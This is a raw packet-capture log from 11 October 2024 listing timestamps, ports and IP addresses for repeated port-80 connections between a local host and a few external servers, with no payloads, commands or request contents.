Oct 11, 2024 10:02:55.821353912 CEST	49854	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:55.915638924 CEST	80	49854	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:56.350677967 CEST	80	49854	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:56.350691080 CEST	80	49854	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:56.350708961 CEST	80	49854	172.67.220.57	192.168.11.20
Oct 11, 2024 10:02:56.351030111 CEST	49854	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:56.354119062 CEST	49854	80	192.168.11.20	172.67.220.57
Oct 11, 2024 10:02:56.448584080 CEST	80	49854	172.67.220.57	192.168.11.20
Oct 11, 2024 10:03:01.508102894 CEST	49855	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:01.657567978 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:01.657810926 CEST	49855	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:01.672523022 CEST	49855	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:01.821945906 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.658530951 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.658545971 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.658559084 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.658571005 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.658581972 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.658607006 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.658607960 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.658742905 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.658765078 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.658776045 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.658778906 CEST	49855	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:02.658943892 CEST	49855	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:02.659120083 CEST	49855	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:02.808487892 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.808650017 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.808711052 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.808824062 CEST	49855	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:02.808881044 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.808959007 CEST	80	49855	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:02.809043884 CEST	49855	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:02.809137106 CEST	49855	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:03.187127113 CEST	49855	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:04.204535007 CEST	49856	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:04.353899002 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:04.354068995 CEST	49856	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:04.361696959 CEST	49856	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:04.510972023 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.334484100 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.334508896 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.334525108 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.334537029 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.334551096 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.334563971 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.334575891 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.334588051 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.334599972 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.334611893 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.334660053 CEST	49856	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:05.334739923 CEST	49856	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:05.334739923 CEST	49856	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:05.334739923 CEST	49856	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:05.334815979 CEST	49856	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:05.484060049 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.484169960 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.484246016 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.484301090 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.484330893 CEST	80	49856	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:05.484337091 CEST	49856	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:05.484467030 CEST	49856	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:05.874087095 CEST	49856	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:06.891693115 CEST	49857	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:07.041088104 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:07.041331053 CEST	49857	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:07.049134970 CEST	49857	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:07.049210072 CEST	49857	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:07.198534012 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:07.198546886 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:07.198745012 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:07.198838949 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.064083099 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.064121962 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.064176083 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.064234972 CEST	49857	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:08.064286947 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.064301968 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.064312935 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.064338923 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.064374924 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.064460039 CEST	49857	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:08.064460039 CEST	49857	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:08.064479113 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.064507008 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.064588070 CEST	49857	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:08.064635038 CEST	49857	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:08.213768959 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.213783979 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.213794947 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.213807106 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.213885069 CEST	80	49857	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:08.214008093 CEST	49857	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:08.214086056 CEST	49857	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:08.560873032 CEST	49857	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:09.578371048 CEST	49858	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:09.727757931 CEST	80	49858	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:09.727925062 CEST	49858	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:09.733494997 CEST	49858	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:09.882755995 CEST	80	49858	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:10.149296045 CEST	80	49858	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:10.149555922 CEST	80	49858	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:10.149686098 CEST	49858	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:10.151415110 CEST	49858	80	192.168.11.20	68.66.226.116
Oct 11, 2024 10:03:10.300640106 CEST	80	49858	68.66.226.116	192.168.11.20
Oct 11, 2024 10:03:15.261081934 CEST	49859	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:15.363992929 CEST	80	49859	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:15.364175081 CEST	49859	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:15.378912926 CEST	49859	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:15.479674101 CEST	80	49859	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:15.480123043 CEST	80	49859	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:15.480307102 CEST	49859	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:16.887202978 CEST	49859	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:16.988071918 CEST	80	49859	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:17.905050039 CEST	49860	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:18.007180929 CEST	80	49860	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:18.007314920 CEST	49860	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:18.014981985 CEST	49860	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:18.116512060 CEST	80	49860	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:18.116524935 CEST	80	49860	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:18.116647005 CEST	49860	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:19.527234077 CEST	49860	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:19.628607988 CEST	80	49860	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:20.544698000 CEST	49861	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:20.647293091 CEST	80	49861	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:20.647500992 CEST	49861	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:20.655399084 CEST	49861	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:20.655481100 CEST	49861	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:20.759289980 CEST	80	49861	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:20.760238886 CEST	80	49861	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:23.184691906 CEST	49862	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:23.287050009 CEST	80	49862	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:23.287209988 CEST	49862	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:23.292311907 CEST	49862	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:23.393491030 CEST	80	49862	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:23.394778013 CEST	80	49862	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:23.394876003 CEST	80	49862	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:23.395049095 CEST	49862	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:23.397155046 CEST	49862	80	192.168.11.20	76.223.54.146
Oct 11, 2024 10:03:23.498353004 CEST	80	49862	76.223.54.146	192.168.11.20
Oct 11, 2024 10:03:28.506469011 CEST	49863	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:28.606448889 CEST	80	49863	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:28.606678963 CEST	49863	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:28.614450932 CEST	49863	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:28.714358091 CEST	80	49863	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:28.715912104 CEST	80	49863	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:28.716240883 CEST	49863	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:30.118618965 CEST	49863	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:30.218628883 CEST	80	49863	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:31.136106968 CEST	49864	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:31.235907078 CEST	80	49864	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:31.236051083 CEST	49864	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:31.244719982 CEST	49864	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:31.344587088 CEST	80	49864	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:32.758697987 CEST	49864	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:32.902412891 CEST	80	49864	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:33.776098967 CEST	49865	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:33.876055956 CEST	80	49865	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:33.876169920 CEST	49865	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:33.884876966 CEST	49865	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:33.884924889 CEST	49865	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:33.884974957 CEST	49865	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:33.984663963 CEST	80	49865	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:33.984761953 CEST	80	49865	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:33.984929085 CEST	80	49865	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:33.985126972 CEST	80	49865	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:33.985136986 CEST	80	49865	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:33.985179901 CEST	80	49865	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:33.985188007 CEST	80	49865	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:33.986732960 CEST	80	49865	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:33.986833096 CEST	49865	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:34.255292892 CEST	80	49864	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:34.255559921 CEST	49864	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:35.398721933 CEST	49865	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:35.498444080 CEST	80	49865	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:36.416209936 CEST	49866	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:36.516204119 CEST	80	49866	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:36.516402006 CEST	49866	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:36.521560907 CEST	49866	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:36.621561050 CEST	80	49866	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:37.530405045 CEST	80	49866	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:37.530436039 CEST	80	49866	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:37.530714035 CEST	49866	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:37.532530069 CEST	49866	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:37.534687042 CEST	80	49866	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:37.534852028 CEST	49866	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:37.632380009 CEST	80	49866	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:42.643146038 CEST	49867	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:42.743244886 CEST	80	49867	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:42.743382931 CEST	49867	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:42.751025915 CEST	49867	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:42.851186037 CEST	80	49867	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:43.774925947 CEST	80	49867	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:43.775099993 CEST	49867	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:44.256228924 CEST	49867	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:44.356760979 CEST	80	49867	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:45.273730040 CEST	49868	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:45.373678923 CEST	80	49868	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:45.373912096 CEST	49868	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:45.381470919 CEST	49868	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:45.481138945 CEST	80	49868	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:45.483191013 CEST	80	49868	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:45.483331919 CEST	49868	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:46.896193027 CEST	49868	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:46.995889902 CEST	80	49868	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:47.913618088 CEST	49869	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:48.013468027 CEST	80	49869	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:48.013601065 CEST	49869	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:48.021378040 CEST	49869	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:48.021430016 CEST	49869	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:48.021476984 CEST	49869	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:48.121216059 CEST	80	49869	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:48.121319056 CEST	80	49869	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:48.121443033 CEST	80	49869	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:48.121687889 CEST	80	49869	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:48.121697903 CEST	80	49869	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:48.121706963 CEST	80	49869	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:48.121717930 CEST	80	49869	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:48.126765966 CEST	80	49869	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:48.126940966 CEST	49869	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:49.536396027 CEST	49869	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:49.636188030 CEST	80	49869	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:50.554085016 CEST	49870	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:50.653590918 CEST	80	49870	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:50.653789043 CEST	49870	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:50.658931017 CEST	49870	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:50.758315086 CEST	80	49870	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:51.673227072 CEST	80	49870	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:51.673291922 CEST	80	49870	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:51.673474073 CEST	49870	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:51.675333977 CEST	49870	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:51.678448915 CEST	80	49870	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:51.678582907 CEST	49870	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:51.774725914 CEST	80	49870	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:56.796380043 CEST	49871	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:56.895860910 CEST	80	49871	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:56.896013021 CEST	49871	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:56.903669119 CEST	49871	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:57.003000975 CEST	80	49871	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:57.922358990 CEST	80	49871	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:57.922511101 CEST	49871	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:58.409356117 CEST	49871	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:58.508713007 CEST	80	49871	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:59.426713943 CEST	49872	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:59.526869059 CEST	80	49872	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:59.527010918 CEST	49872	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:59.534677029 CEST	49872	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:03:59.634855986 CEST	80	49872	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:59.637581110 CEST	80	49872	15.197.148.33	192.168.11.20
Oct 11, 2024 10:03:59.637772083 CEST	49872	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:01.049349070 CEST	49872	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:01.149624109 CEST	80	49872	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:02.066729069 CEST	49873	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:02.166908979 CEST	80	49873	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:02.167068958 CEST	49873	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:02.174880981 CEST	49873	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:02.174928904 CEST	49873	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:02.274918079 CEST	80	49873	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:02.275046110 CEST	80	49873	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:02.275055885 CEST	80	49873	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:02.275170088 CEST	80	49873	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:02.275178909 CEST	80	49873	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:02.275187969 CEST	80	49873	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:02.275290012 CEST	80	49873	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:03.186367989 CEST	80	49873	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:03.186563015 CEST	49873	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:03.689389944 CEST	49873	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:03.789375067 CEST	80	49873	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:04.706830978 CEST	49874	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:04.806780100 CEST	80	49874	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:04.806919098 CEST	49874	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:04.812009096 CEST	49874	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:04.911683083 CEST	80	49874	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:11.864758015 CEST	80	49874	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:11.864825010 CEST	80	49874	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:11.865114927 CEST	49874	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:11.866947889 CEST	49874	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:11.870460987 CEST	80	49874	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:11.870584011 CEST	49874	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:11.966614008 CEST	80	49874	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:16.982316971 CEST	49875	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:17.081825018 CEST	80	49875	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:17.082007885 CEST	49875	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:17.089647055 CEST	49875	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:17.189085007 CEST	80	49875	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:17.196105957 CEST	80	49875	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:17.196233988 CEST	49875	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:18.592425108 CEST	49875	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:18.691854000 CEST	80	49875	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:19.609838009 CEST	49876	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:19.709645987 CEST	80	49876	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:19.709937096 CEST	49876	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:19.717530966 CEST	49876	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:19.817579031 CEST	80	49876	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:20.736922979 CEST	80	49876	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:20.737160921 CEST	49876	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:21.232397079 CEST	49876	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:21.332149029 CEST	80	49876	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:22.249902010 CEST	49877	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:22.349781036 CEST	80	49877	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:22.349895954 CEST	49877	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:22.357806921 CEST	49877	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:22.457588911 CEST	80	49877	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:22.457684040 CEST	80	49877	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:22.457813978 CEST	80	49877	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:22.457823038 CEST	80	49877	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:22.457830906 CEST	80	49877	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:22.457864046 CEST	80	49877	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:22.457873106 CEST	80	49877	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:22.458432913 CEST	80	49877	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:22.458611965 CEST	49877	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:23.872483015 CEST	49877	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:23.972718000 CEST	80	49877	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:24.889892101 CEST	49878	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:24.989938974 CEST	80	49878	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:24.990144968 CEST	49878	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:24.995244980 CEST	49878	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:25.095155001 CEST	80	49878	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:26.018672943 CEST	80	49878	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:26.018687963 CEST	80	49878	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:26.019090891 CEST	49878	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:26.020924091 CEST	49878	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:26.025799990 CEST	80	49878	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:26.025923967 CEST	49878	80	192.168.11.20	15.197.148.33
Oct 11, 2024 10:04:26.120795012 CEST	80	49878	15.197.148.33	192.168.11.20
Oct 11, 2024 10:04:34.106163025 CEST	49879	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:04:34.205476046 CEST	80	49879	3.33.130.190	192.168.11.20
Oct 11, 2024 10:04:34.205641031 CEST	49879	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:04:34.210796118 CEST	49879	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:04:34.309997082 CEST	80	49879	3.33.130.190	192.168.11.20
Oct 11, 2024 10:04:34.312469959 CEST	80	49879	3.33.130.190	192.168.11.20
Oct 11, 2024 10:04:34.312573910 CEST	80	49879	3.33.130.190	192.168.11.20
Oct 11, 2024 10:04:34.312776089 CEST	49879	80	192.168.11.20	3.33.130.190
